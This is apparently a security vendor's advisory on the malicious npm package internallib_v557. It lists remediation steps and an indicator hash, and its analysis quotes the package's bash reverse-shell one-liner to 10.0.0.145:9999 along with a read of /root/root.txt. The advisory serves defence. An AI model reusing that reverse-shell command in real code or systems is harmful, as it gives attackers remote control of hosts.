Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

internallib_v557npm

Malicious code in internallib_v557 (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5678
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall internallib_v557

What this malware does

internallib_v557 has no legitimate functionality — its single exported command() function in index.js writes a malicious package.json to /tmp/uhclabs_local_check/ whose start script is a bash reverse shell to 10.0.0.145:9999 (/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.145/9999 0>&1'), then runs npm publish --registry http://0.0.0.0:4873/ to push that reverse-shell-bearing package into a local Verdaccio registry where it can be pulled by other consumers. The same function also executes cat /root/root.txt and logs the contents to stdout, attempting to exfiltrate a privileged host file the package has no legitimate need to read. The harmful path fires when any consumer requires the package and invokes the advertised API; since the package has no other functionality, normal use guarantees compromise.

Malicious versions

1 flagged
1.0.10

Indicators of compromise (SHA-256)

5cfa498f80e5965de3c072803c8d6e812e75bc5a4fb031f739cbd9c181724be3

Frequently asked questions

No. internallib_v557 on npm has been identified as a malicious package (version 1.0.10 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005751

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection
internallib_v557 (npm) malicious package — MAL-2026-5678 | O3 Security